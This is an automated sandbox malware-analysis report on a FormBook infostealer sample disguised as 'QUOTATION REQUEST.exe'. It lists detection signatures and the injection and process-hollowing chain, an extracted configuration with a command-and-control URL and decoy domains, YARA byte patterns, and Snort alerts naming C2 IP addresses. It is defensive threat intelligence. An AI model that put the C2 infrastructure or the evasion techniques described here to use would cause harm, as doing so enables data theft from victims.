Play interactive tour

Edit tour

Analysis Report QUOTATION REQUEST.exe

Overview

General Information

Sample Name:	QUOTATION REQUEST.exe
Analysis ID:	402973
MD5:	64af41000584694858d0fcc37b1bf69b
SHA1:	707c77c61fafdd736c1e02bfdbc8ce7ce24cc759
SHA256:	fea7b692b71803eb020f04ec1a5f8118f5845910d9677fdb4636d9a7d209d0fa
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

QUOTATION REQUEST.exe (PID: 4660 cmdline: 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: 64AF41000584694858D0FCC37B1BF69B)

QUOTATION REQUEST.exe (PID: 4112 cmdline: C:\Users\user\Desktop\QUOTATION REQUEST.exe MD5: 64AF41000584694858D0FCC37B1BF69B)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 5268 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 5784 cmdline: /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x1c12b0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1c164a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1e86d0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1e8a6a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1cd35d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1f477d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1cce49:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1f4269:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1cd45f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1f487f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1cd5d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1f49f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1c2062:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1e9482:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1cc0c4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1f34e4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1c2dda:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ea1fa:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1d244f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1f986f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d34f2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1cf381:$sqlite3step: 68 34 1C 7B E1 0x1cf494:$sqlite3step: 68 34 1C 7B E1 0x1f67a1:$sqlite3step: 68 34 1C 7B E1 0x1f68b4:$sqlite3step: 68 34 1C 7B E1 0x1cf3b0:$sqlite3text: 68 38 2A 90 C5 0x1cf4d5:$sqlite3text: 68 38 2A 90 C5 0x1f67d0:$sqlite3text: 68 38 2A 90 C5 0x1f68f5:$sqlite3text: 68 38 2A 90 C5 0x1cf3c3:$sqlite3blob: 68 53 D8 7F 8C 0x1cf4eb:$sqlite3blob: 68 53 D8 7F 8C 0x1f67e3:$sqlite3blob: 68 53 D8 7F 8C 0x1f690b:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: QUOTATION REQUEST.exe PID: 4660	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.QUOTATION REQUEST.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.QUOTATION REQUEST.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.QUOTATION REQUEST.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158b9:$sqlite3step: 68 34 1C 7B E1 0x159cc:$sqlite3step: 68 34 1C 7B E1 0x158e8:$sqlite3text: 68 38 2A 90 C5 0x15a0d:$sqlite3text: 68 38 2A 90 C5 0x158fb:$sqlite3blob: 68 53 D8 7F 8C 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x127898:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x127c32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14ecb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14f052:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x133945:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15ad65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15a851:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x133a47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15ae67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x133bbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x15afdf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12864a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14fa6a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1326ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x159acc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1293c2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1507e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x138a37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x15fe57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x139ada:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x135969:$sqlite3step: 68 34 1C 7B E1 0x135a7c:$sqlite3step: 68 34 1C 7B E1 0x15cd89:$sqlite3step: 68 34 1C 7B E1 0x15ce9c:$sqlite3step: 68 34 1C 7B E1 0x135998:$sqlite3text: 68 38 2A 90 C5 0x135abd:$sqlite3text: 68 38 2A 90 C5 0x15cdb8:$sqlite3text: 68 38 2A 90 C5 0x15cedd:$sqlite3text: 68 38 2A 90 C5 0x1359ab:$sqlite3blob: 68 53 D8 7F 8C 0x135ad3:$sqlite3blob: 68 53 D8 7F 8C 0x15cdcb:$sqlite3blob: 68 53 D8 7F 8C 0x15cef3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.pedroiniesta.net/n7ad/"], "decoy": ["orchardevent.com", "inthebeginningshop.com", "keodm.com", "hangthejury.com", "cannabisllp.com", "letsratethis.com", "milanfashionperu.com", "adcvip.com", "professionalcprclasses.com", "checkmytradesmanswork.com", "sloanksmith.com", "apnajamshedpur.com", "665448.com", "zryld.com", "cabot.city", "graet.design", "furbabiesandflowers.com", "silkisensations.com", "sawubonastore.com", "screenwinz18.com", "freecleanlimpieza.com", "kthayerart.com", "domennyarendi12.net", "buffalobooze.com", "1066704.com", "godstrader.com", "wheyfordays.com", "liquidacion-express.com", "cinmax.xyz", "evamikko.com", "bestsellerselect.com", "fr-doms1.xyz", "publicoon.com", "sciencecopy.com", "buenosbison.icu", "senecadeer.com", "madisonroselove.com", "momanent.com", "colabchat.com", "oodledesigns.com", "dowershop.com", "shop-daily.info", "ivoyletdigital.com", "cqyuebing.net", "market-failure10.com", "lcpcap.com", "textmining.pro", "rodrigueslawgroup.com", "justwearshape.com", "famharmonie.com", "sublimationsuperstore.com", "xoyicgv.icu", "ejaysaffordablewebdesigns62.xyz", "sendanangelofhope.com", "ezglassandgifts.com", "stpl.world", "weddingmaskswv.com", "iprognos.com", "louanatummers.com", "businessboxitalia.network", "hk-duravit.com", "bbss2020.com", "tomojapanesetogo.com", "organicmatico.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: QUOTATION REQUEST.exe	Virustotal: Detection: 18%			Perma Link
Source: QUOTATION REQUEST.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE

Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: QUOTATION REQUEST.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: QUOTATION REQUEST.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source:	Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source:	Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 4x nop then pop ebx	3_2_00406AA3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe	Code function: 4x nop then pop edi	3_2_0040C3C3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop ebx	9_2_00ED6AA3
Source: C:\Windows\SysWOW64\wlanext.exe	Code function: 4x nop then pop edi	9_2_00EDC3C3

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49746 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 81.17.18.196:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49751 -> 206.189.50.215:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 192.185.131.134:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 46.30.211.38:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.pedroiniesta.net/n7ad/

